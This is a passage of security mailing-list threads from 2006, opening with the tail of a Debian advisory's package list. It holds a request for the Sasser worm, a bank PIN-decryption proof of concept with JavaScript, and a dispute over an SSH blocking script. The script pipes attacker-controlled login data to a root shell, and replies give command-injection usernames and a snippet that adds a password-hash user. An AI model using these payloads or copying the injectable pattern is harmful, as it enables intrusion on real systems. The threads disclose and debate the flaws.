  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_ia64.deb
    Size/MD5 checksum:   229398 e9e6dca2f2250bd07c0605e393105339

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_m68k.deb
    Size/MD5 checksum:   171354 93b5762ecf847bba77396f08b04e225e
  http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_m68k.deb
    Size/MD5 checksum:   838386 2d63f36ef81c84ae8bdad8f2be5f1797

mips architecture (MIPS (Big Endian))
Re: [Full-disclosure] Sasser or other nasty worm needed
Chris -

I don't know what to make of your "please reply off-list; I'm not a member" comment. It's almost as ridiculous as what you are requesting.

If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district.

Speaking as a network engineer for a large midwestern school district, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out, I'll be making a point of asking who the computer teachers are in that building.

You want to teach these kids a lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network.

> I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful.
>
> Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member.
>
> Thank you,
> Chris
Re: [Full-disclosure] [inbox] Sasser or other nasty worm needed
wow, the fastest way to catch any type of worm like that is to stick an unpatched, no A/V running, windows box out on the internet. You'll have so many bugs you won't know what to do with them all...

Exibr

-----Original Message-----
From: kikazz [mailto:[EMAIL PROTECTED]
Sent: Sunday, November 26, 2006 5:32 PM
To: full-disclosure@lists.grok.org.uk
Subject: [inbox] [Full-disclosure] Sasser or other nasty worm needed

> I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful.
>
> Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member.
>
> Thank you,
> Chris
Re: [Full-disclosure] Sasser or other nasty worm needed
> Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for.

You're kidding, right?

.. just take a fresh install of Win2K and hook it to the Internet. Go get coffee. Come back in ~15min. Boot to BartPE (or Knoppix, etc) and look for anything new in %systemroot%. You'll probably have more than one.

It'll be a binary though, probably packed/encrypted 3+ times (and that's annoying, but not impossible, to reverse-engineer).

The source code for all the [SD|RX|AGO]bot variants is easily found on the web. Recompile in Visual Basic, pack with UPX (or whatever) and off you go. To prison that is...

Meanwhile .. a quick look at your email :

  Received: from blueberry ( [69.3.80.94]) by mx.google.com with ESMTP id i20sm9690041wxd.2006.11.26.14.32.22; Sun, 26 Nov 2006 14:32:22 -0800 (PST)
  From: kikazz [EMAIL PROTECTED]

suggests that you aren't a teacher at all ..

  network:IP-Network-Block:69.3.80.88 - 69.3.80.95
  network:Org-Name:Compu' Counts Consulting Inc.
  network:Street-Address:6174 Darleon Place
  network:City:ALEXANDRIA
  network:State:VA
  network:Postal-Code:22310

sigh .. another consultant that is trying to get other folks to do his dirty work...

Cheers,

Michael Holstein CISSP GCIA
Information Security Administrator
Cleveland State University
Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards andPhishing Banks (fwd)
More than a year old (3rd August, 2005) - Defeating CITI-BANK Virtual Keyboard Protection

http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0142.html
http://hackingspirits.com/vuln-rnd/Defeat-CitiBank-VK.zip
http://xforce.iss.net/xforce/xfdb/21727

Regards,
-d

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gadi Evron
Sent: Sunday, November 26, 2006 12:18 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Defeating Image-Based Virtual Keyboards and Phishing Banks (fwd)
Instead of sending the remote image and waiting for the key-stroke information to be sent back to the server (the technique for which the screenshots of the pointer location on click, described above, were used), some banks send the PIN number in cleartext, while others encrypt it; one such example is cajamurcia. Even when encryption is used, banks tend to implement it badly, making it easy to recover the PIN number from the encrypted form.

I investigated a bit more on how cajamurcia handles such PIN strokes (with virtual keyboards) and I noticed something strange: they take the timestamp of their server (cajamurcia) and send it to you - this already poses a security problem - and this timestamp is then used to encrypt the PIN number you entered. This would have been a good idea if the timestamp was not sent back to the server, making it hard or semi-hard to guess the timestamp used to encrypt the data, but at the same time making it harder for the server to know what timestamp was provided to the client (unless they store it inside their session information). Anyhow, as it is sent back to the server, we have everything we need to decrypt the data (PIN number).

PoC:

A request to the server would look like:

OPERACION=0002
CAJA=2043
CAMINO=2043
PGDESTI=CORP
BROKER=SI
VRS=001
PAN=2043123456
SELLO=16100616012569
CL=1161006956
PINV3=si
PANA=2043
PANB=123456
PIN=BBCB6E341C56C6B2
IDIOMA=01

We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL being the timestamp and PIN being the encrypted form of the PIN number.
If we feed these into the following JS code:

https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js

function hexToString(h) {
    var r = '';
    // skip a leading "0x" if present, then consume two hex digits per byte
    for (var i = (h.substr(0, 2) == '0x') ? 2 : 0; i < h.length; i += 2) {
        r += String.fromCharCode(parseInt(h.substr(i, 2), 16));
    }
    return r;
}

calcula = '1161006956';
ciphertext = hexToString('0xBBCB6E341C56C6B2');
// des() is the DES routine loaded from MOD.js above; the key is eight
// characters cut out of the CL timestamp that the server itself supplied
var cleartext = des(calcula.substr(2, 8), ciphertext, 0, 1, '');
console.debug(cleartext);

We will get our original PIN number.

This isn't necessarily easier, as it requires data capture, which isn't always easy, but screen captures usually require either OCR or manual labor, which the above code does not.

One needs to remember that Javascript (or any client-side code and information) is indeed on the client's side and under the client's control. An attacker can kick it aside, or learn to emulate it and attack it - manipulate it. Client-side encryption where the code and key are visible is pointless. No matter how much obfuscation or cross-frame and cross-file scripting is used, calling for different functions and parameters, nor how many functions you obfuscate your code through, it can be read and manipulated.

We made several email and phone attempts over the past couple of months to reach cajamurcia and report this security issue to them. Gadi Evron even asked a couple of folks in Spain to help with contacting them by phone, even speaking
Re: [Full-disclosure] Sasser or other nasty worm needed
What am I? Consultant? School Teacher? Terrorist?

On 11/27/06, K F (lists) [EMAIL PROTECTED] wrote:

Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? It's not like he is intentionally letting it loose on the entire school LAN.

-KF

[EMAIL PROTECTED] wrote:

Chris -

I don't know what to make of your "please reply off-list; I'm not a member" comment. It's almost as ridiculous as what you are requesting. If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district. Speaking as a network engineer for a large midwestern school district, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out, I'll be making a point of asking who the computer teachers are in that building. You want to teach these kids a lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network.

I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list.
I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member.

Thank you,
Chris

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The state of JavaScript Hacking
So what you are trying to say is that JavaScript is bad, because it nowadays runs on more than one platform? Or did I miss something? Since when has the choice of programming language made any difference?

Best,
Martin

--
Martin Johns
http://www.martinjohns.com
[Full-disclosure] SSH brute force blocking tool
For those interested, I wrote a program called Sharpener which is an SSH brute force blocking tool that also reports back the offenders' addresses. I have begun posting the information on the attackers as well as sending out messages (whenever possible) to the admins of these domains. Think of it as an RBL for SSH attackers. The goal is to identify these machines in order for others to implement safeguards (ACLs) against these hosts. Feel free to comment/complain.

http://www.infiltrated.net/sharpener (tool)
http://www.infiltrated.net/bruteforcers (offenders)

--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

"The happiness of society is the end of government." John Adams
Re: [Full-disclosure] Sasser or other nasty worm needed
a douchebag? I dunno, but why the hell aren't your boxes patched to Sasser yet?

-KF

deep fried wrote:

What am I? Consultant? School Teacher? Terrorist?
Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards and Phishing Banks (fwd)
Over 8 years old (mid 1997/8) - http://www.dotsec.com/onBank.html?topic=302544

Lyal

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Debasis Mohanty
Sent: Tuesday, 28 November 2006 6:12 PM
To: 'Gadi Evron'; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards and Phishing Banks (fwd)

More than a year old (3rd August, 2005) - Defeating CITI-BANK Virtual Keyboard Protection
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0142.html
http://hackingspirits.com/vuln-rnd/Defeat-CitiBank-VK.zip
http://xforce.iss.net/xforce/xfdb/21727

Regards,
-d
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 02:22:10PM -0500, J. Oquendo wrote:
For those interested, I wrote a program called Sharpener which is an SSH brute force blocking tool that also reports back the offenders' addresses. [...]
http://www.infiltrated.net/sharpener (tool)
http://www.infiltrated.net/bruteforcers (offenders)

Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

--
[EMAIL PROTECTED] | finger me for my pgp key.
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006 13:36:39 EST, K F (lists) said:
Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? It's not like he is intentionally letting it loose on the entire school LAN.

You would have us believe that the guy is clued enough to run a closed lab without screwing up (and there's *lots* of ways to screw up, starting with forgetting to wipe the drives afterwards, forgetting to disable a wireless card, forgetting to not plug any of the boxes into the normal net, forgetting to...). And yet he's not clued enough to know how to find a copy of Sasser by himself.

There are a lot of people who are of the opinion that if you have to ask where to find a copy of Sasser, you're not clued enough to be trusted with a copy.
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

Since you seem to be clueless I'll answer step by step. Here goes, idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory.)

if [ `whoami` != root ]
then
    echo "This script needs to run under the root user"
    exit
else
    if [ -e /tmp/hosts.deny ]
    then
        rm /tmp/hosts.deny
    fi

Check to see if the user is root. If not, tell the user "Hey dumbass, you need to be root"; if the user is root, continue.

    awk '/error retrieving/{getline;print $13}' /var/log/secure | sort -ru > /tmp/hosts.deny
    diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ && />/{print $2}' >> /etc/hosts.deny

There is no hocus pocus here. Look at /var/log/secure and find the term "error retrieving" and print the next line, 13th column. Then sort it and print the unique entries into /tmp/hosts.deny. After you do this, compare /tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny into /etc/hosts.deny.

    OS=$( uname|sed -n '1p')

This is a no brainer. No voodoo there.

    # IPTables function...
    ifaddr=`ifconfig -a|awk '/inet/ && !/inet6/ && !/127.0/ && !/192.168/{print $2}'|sed 's/addr\://g'`

Do an ifconfig on the machine. Ignore the word inet, inet6, 127.0, 192.168, print the second field, and replace the term "addr:" with nothing. No voodoo here, jackass.

    function IPT {
        awk '!/#/ && /\./ && !a[$0]++ {print "iptables -A INPUT -s " $1 " -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\
        awk '/iptables/ && !/#/ && !/-s -i/'|sh
    }

This is such a hacker thing coming now. You caught me. Ignore comments (!/#/), print anything with a decimal (/\./), make this unique (!a[$0]++) (!a[$0]++ = uniq ... shhh, don't expose my awk hacking).

    if [ "$OS" = "Linux" ]
    then
        IPT
    fi

This is where I guess I hack the world. Check the OS and if it's Linux, then cat /etc/hosts.deny, ignore comments (!/#/), print anything with a decimal (/\./), make this unique (!a[$0]++) (!a[$0]++ = uniq ... shhh, don't expose my awk hacking), then print "iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT". $1 = IP address, $ifaddr = IP address of the interface.

    echo "Copying sharpener to /usr/local/bin"
    sed -n '1,67p' ./sharpener > /usr/local/bin/sharpener
    echo fi >> /usr/local/bin/sharpener
    rm ./sharpener

Here goes the voodoo... You ready? Print lines 1 through 67 of this same file but put it in /usr/local/sharpener, add a "fi" to that same file, then remove the original.

    sleep 2
    echo
    echo "Adding Sharpener to cron"
    echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener"
    if [ -e /var/spool/cron/root ]
    then
        echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener" >> /var/spool/cron/root
    else
        if [ -e /var/cron/tabs/root ]
        then
            echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener" >> /var/cron/tabs/root
        fi
    fi

Add it to cron.

    awk '!/192.168/ && !/127./ && !/#/ && !/172.32/{print $1 " has been blocked via SSH"}' /etc/hosts.deny |\
    mail -s Sharpener [EMAIL PROTECTED]
fi

Print out the first column of /etc/hosts.deny ... Ignore 127., ignore #, and ignore 172.32, then mail it to an evil hacker site so they can traverse telekinetically into your machine. Right.

--
J. Oquendo
http://www.infiltrated.net
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Tavis Ormandy wrote:
Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

Since you seem to be clueless I'll answer step by step. Here goes, idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory.)

awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru > /tmp/hosts.deny

insecure temporary file creation, race condition if a user can create that file between the unlink and the open.

$ ssh 'error retrieving'@localhost
$ ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`

Oops.

Thanks, Tavis.

--
[EMAIL PROTECTED] | finger me for my pgp key.
Re: [Full-disclosure] Sasser or other nasty worm needed
On 11/27/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
And yet he's not clued enough to know how to find a copy of Sasser by himself. There are a lot of people who are of the opinion that if you have to ask where to find a copy of Sasser, you're not clued enough to be trusted with a copy.

yeah I agree, whoever posted/started this original thread was on gmail and is not clued in enough to take a quick left glance at the adsense frame and s/he will get tonnes of bait from google :)- go figure..
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Since you seem to be clueless I'll answer step by step. Here goes, idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory.)

Uh... actually, no. The provided exploit Will work, and you're the idiot. Here, let me show you. You do this:

awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru > /tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ && />/{print $2}' >> /etc/hosts.deny

There is no hocus pocus here. Look at /var/log/secure and find the term "error retrieving" and print the next line, 13th column. Then sort it and print the unique entries into /tmp/hosts.deny. After you do this, compare /tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny into /etc/hosts.deny.

What will be in column 13 when Tavis does this:

Tavis Ormandy wrote:
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

Why, the shelled-out output of `/sbin/halt`! Or, hey, anything he or I care to put inside backticks. You'll execute it blindly, as root, on your system.

Kids, don't use this script. Please.

--
gabriel rosenkoetter
[EMAIL PROTECTED]
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
[...]
$ ssh 'error retrieving'@localhost
$ ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`
Oops.

So again, dumbass... Look at the script. Although YOU'RE opening /var/log/authlog, what is the script opening? Please tell me you're really not that stupid. And if someone else decided to modify this script, what does that have to do with what I posted? How exactly is my script a backdoor as you claim? Enquiring minds want to know this since you claim it's a backdoor. Please tell me, outside of your modification, how this is going to backdoor someone.

--
J. Oquendo
http://www.infiltrated.net
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote:
[...]
Why, the shelled-out output of `/sbin/halt`! Or, hey, anything he or I care to put inside backticks. You'll execute it blindly, as root, on your system.
Kids, don't use this script. Please.

Jesus christ, people get stupider by the moment. W/e, the script is there for scrutiny; there is no hidden voodoo. If you DO want to see hidden voodoo, here it is,,,

--
J. Oquendo
http://www.infiltrated.net
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote:
[...]
Kids, don't use this script. Please.

Here is your voodoo backdoor, moron:

file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
sed -n '1p' $file|awk -F : 'BEGIN{OFS=":"}{$1="test"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2' >> $file
file2=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
sed -n '1p' $file2|sed 's/[^:]*:/test:/' >> $file2
who=`sed -n '58p' sysexits.h |awk '{print $5}'`
what=`sed -n '60p' wireless.h |awk 'gsub(/,/, ""){print $4}'`
when=` sed -n '60p' wireless.h |awk 'gsub(/,/, //){print $4}'`
$what|$who full-disclosure@lists.grok.org.uk

--
J. Oquendo
http://www.infiltrated.net
Re: [Full-disclosure] SSH brute force blocking tool
On 11/27/06, J. Oquendo [EMAIL PROTECTED] wrote:
There is no hocus pocus here. Look at /var/log/secure and find the term "error retrieving" and print the next line, 13th column. Then sort it and print the unique entries into /tmp/hosts.deny. After you do this, compare /tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny into /etc/hosts.deny.

Parsing malicious input with shell commands is like disarming land mines with a hammer. And doing it as root? That's like disarming land mines with a hammer while you're stark naked.

Regards,
Brian
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 03:59:37PM -0500, gabriel rosenkoetter wrote:
Uh... actually, no. The provided exploit Will work, and you're the idiot.

Begging your pardon, you are saved by single-quoting your awk(1) statement:

awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru > /tmp/hosts.deny
[...]

What will be in column 13 when Tavis does this:

Tavis Ormandy wrote:
ssh 'foo bar `/sbin/halt`'@victim
[...]

Why, the shelled-out output of `/sbin/halt`!

Nope, I'm wrong, just the literal string `/sbin/halt`, which you never exec. Mea culpa. Tavis's exploit doesn't do scary things, although he's right you should really be doing a bit more sanitization of (evil) user-supplied input, given that you're (insisting that you) run as root.

On Mon, Nov 27, 2006 at 04:12:11PM -0500, J. Oquendo wrote:
Look at the script. Although YOU'RE opening /var/log/authlog what is the script opening? Please tell me you're really not that stupid.

Actually, your BSD version DOES open /var/log/authlog (which will fail on FreeBSD, btw, where it's /var/log/auth.log), so you should probably stop casting stones and quit while you're ahead with my explanation above of why Tavis's exploit is a non-starter.

But since we're on the topic... wouldn't it be a better plan to check the local syslog.conf for the location of the auth failure log messages rather than hard code it?

--
gabriel rosenkoetter
[EMAIL PROTECTED]
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:12:11PM -0500, J. Oquendo wrote:
> So again dumbass... Look at the script. Although YOU'RE opening
> /var/log/authlog what is the script opening.

I'm opening authlog as I don't use secure, the same thing applies.

> Please tell me you're really not that stupid. And if someone else decided to
> modify this script, what does that have to do with what I posted. How exactly
> is my script a backdoor as you claim.

It's a backdoor because your script doesn't account for out-of-order log entries, usernames or other data containing spaces thus making your field count incorrect, or other daemons using the string `error retrieving` in their log entries.

The insecure temporary file creation allows a local user to add entries to the passwd file (for example), or create or modify any file as root. Although it doesn't directly allow them to control the data the file is created with, combined with the other flaw this is possible. Even without the other flaw, the existence of some files is a problem, such as /etc/.nologin. The test -e and rm is insufficient, firstly as it's a race condition, and secondly as test -e will return 1 on broken (sometimes called dangling) symlinks.

> Enquiring minds want to know this since you claim it's a backdoor. Please tell
> me outside of your modification how this is going to backdoor someone.

I'm not sure what you mean by modification, I simply substituted the name for the logfile I use.

Thanks, Tavis.

--
[EMAIL PROTECTED] | finger me for my pgp key.
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
> I'm not sure what you mean by modification, I simply substituted the name
> for the logfile I use.
>
> Thanks, Tavis.

So for the third time now. Explain to me how I am backdooring someone's system.

    [EMAIL PROTECTED] include]# uname -a
    Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686 i686 i386 GNU/Linux
    [EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
    222.171.20.252
    211.137.74.58

My logs parse out addresses not named and there is no redirection going on. If you want to say Hey... It should be written as such then gladly do so. But posting hey you're backdooring the planet like a jackass is moronic. Line by line on my machines it does what it needs to do and it does so just fine.

Did you see any notes of Gentoo on the comments? I didn't because I don't use it, never have, don't care to. So if it does something different on Gentoo, let's use the brain for a moment... Gee this works horrible on Gentoo. The author is a shitty writer... I think I should let him know as opposed to Oh my gawd he's backdooring you.

--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

"The happiness of society is the end of government." John Adams
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote:
> Mea culpa. Tavis's exploit doesn't do scary things, although he's right you
> should really be doing a bit more sanitization of (evil) user-supplied input,
> given that you're (insisting that you) run as root.

Gabriel, I was referring to this line:

    awk '!/#/ && /\./ && !a[$0]++ {print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\
    awk '/iptables/ && !/#/ && !/-s -i/'|sh

(note the |sh), $1 can be controlled by specially crafted attempted logins.

Thanks, Tavis.

--
[EMAIL PROTECTED] | finger me for my pgp key.
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 09:29:33PM +0000, Tavis Ormandy wrote:
> Gabriel, I was referring to this line:
>
>     awk '!/#/ && /\./ && !a[$0]++ {print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\
>     awk '/iptables/ && !/#/ && !/-s -i/'|sh
>
> (note the |sh), $1 can be controlled by specially crafted attempted logins.

Aha. Yep, sure can! I couldn't find where the malicious input was actually executed, but I didn't spend long looking. I take back my take back.

--
gabriel rosenkoetter
[EMAIL PROTECTED]
Re: [Full-disclosure] SSH brute force blocking tool
why not save all that trouble and just use the --limit directive in iptables? (examples on the netfilter mailing-list).

~Mike.
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:27:24PM -0500, J. Oquendo wrote:
> Tavis Ormandy wrote:
> > I'm not sure what you mean by modification, I simply substituted the name
> > for the logfile I use.
> >
> > Thanks, Tavis.
>
> So for the third time now. Explain to me how I am backdooring someone's
> system.

J, Please calm down. You have made a programming error in your script that attempts to eliminate the minor `log noise` from incorrect ssh logins with a script that can be subverted to execute arbitrary shell commands.

>     [EMAIL PROTECTED] include]# uname -a
>     Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686 i686 i386 GNU/Linux
>     [EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
>     222.171.20.252
>     211.137.74.58
>
> My logs parse out addresses not named and there is no redirection going on.

Yes, but you assume a fixed format of the log entries. This is not the case. The string "error retrieving" is easily placed in the log by setting it as your username and attempting to login. You also assume that the multiple log entries generated by a failed login are logged atomically (ie, no other log entries will appear between these two entries), this is also not the case.

> If you want to say Hey... It should be written as such then gladly do so.
> But posting hey you're backdooring the planet like a jackass is moronic.

J, you asked people to install your security tool which contacts you with enough information to find out who installed it and where, and contains several rather obvious security flaws. If I mistook stupidity for malice, I apologise.

> Line by line on my machines it does what it needs to do and it does so just
> fine.

This is because your logs don't contain any entries specially crafted by an attacker to subvert your machine. I'm sure some members of the list are already attempting this on your web server, so you can check your logs for examples.

> Did you see any notes of Gentoo on the comments? I didn't because I don't use
> it, never have, don't care to. So if it does something different on Gentoo,
> let's use the brain for a moment... Gee this works horrible on Gentoo. The
> author is a shitty writer... I think I should let him know as opposed to Oh
> my gawd he's backdooring you.

It's a standard format J, my log entries look identical to yours. It has nothing to do with Gentoo.

Thanks, Tavis.

--
[EMAIL PROTECTED] | finger me for my pgp key.
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:27:24PM -0500, J. Oquendo wrote:
> So for the third time now. Explain to me how I am backdooring someone's
> system.
>
>     [EMAIL PROTECTED] include]# uname -a
>     Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686 i686 i386 GNU/Linux
>     [EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
>     222.171.20.252
>     211.137.74.58
>
> My logs parse out addresses not named and there is no redirection going on.
> If you want to say Hey... It should be written as such then gladly do so.

You are dealing with output you can't trust there. $13 could be anything, including \n`rm -rf /`. Later on, you pass $13, unstripped of newlines, backticks, or any number of other special characters to a shell running as uid 0. That shell will proceed to execute whatever we would like it to, where we are the remote attacker who doesn't even have an account.

I don't believe the suggestion was ever that you had malicious intent, but rather that you have very horrible coding security habits. I'm disinclined to sort out which of your machines I can get root on right now because you are running this script, but I would expect that someone reading this mailing list is already on the way and would strongly advise that you disable those cron jobs.

--
gabriel rosenkoetter
[EMAIL PROTECTED]
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
> On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote:
> > Mea culpa. Tavis's exploit doesn't do scary things, although he's right you
> > should really be doing a bit more sanitization of (evil) user-supplied
> > input, given that you're (insisting that you) run as root.
>
> Gabriel, I was referring to this line:
>
>     awk '!/#/ && /\./ && !a[$0]++ {print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\
>     awk '/iptables/ && !/#/ && !/-s -i/'|sh
>
> (note the |sh), $1 can be controlled by specially crafted attempted logins.
>
> Thanks, Tavis.

That specially crafted attempt would be a HUGE raping of TCP/IP. How do you suppose it would be possible for someone to insert 0wn3ed or any other variable outside of an IP address?

--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

"The happiness of society is the end of government." John Adams
Re: [Full-disclosure] SSH brute force blocking tool
> That specially crafted attempt would be a HUGE raping of TCP/IP. How do you
> suppose it would be possible for someone to insert 0wn3ed or any other
> variable outside of an IP address?

Remember the (in)famous quote "...that vulnerability is purely theoretical..."?

I think the point is you don't use $language to split a bunch of fields, and then pipe them back through /bin/sh without making sure they're not malicious. Doesn't matter that you can't think of a way to make them malicious .. somebody else will find one. It's safer to just assume it'll happen and always sanitize variables before you {do_stuff;} with them.

(my $0.02)

~Mike.
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote:
> You are dealing with output you can't trust there. $13 could be anything,
> including \n`rm -rf /`. Later on, you pass $13, unstripped of newlines,
> backticks, or any number of other special characters to a shell running as
> uid 0. That shell will proceed to execute whatever we would like it to, where
> we are the remote attacker who doesn't even have an account.

No it can't. Even if it was rm -rf someone placed in, did you not notice my grep statement? Only print items with a decimal. At no given point anywhere on the 13th column whether it's Solaris, NetBSD, FreeBSD, would there be an option for someone to craft anything...

FreeBSD

    -bash2-2.05b$ uname -a
    FreeBSD ethos.disgraced.org 5.4-RELEASE-p14 FreeBSD 5.4-RELEASE-p14 #1: Thu May 11 01:34:54 CDT 2006 [EMAIL PROTECTED]:/usr/obj/usr/src/sys/ETHOS i386
    -bash2-2.05b$ sudo awk '{print $13}' /var/log/auth.log|sort -ru
    57354
    57340
    57335
    56253
    55125
    49211
    40334
    37188
    3508
    33875
    33635
    33454
    32798
    3137
    2895
    2638
    2408
    2301
    2114
    -

OpenBSD

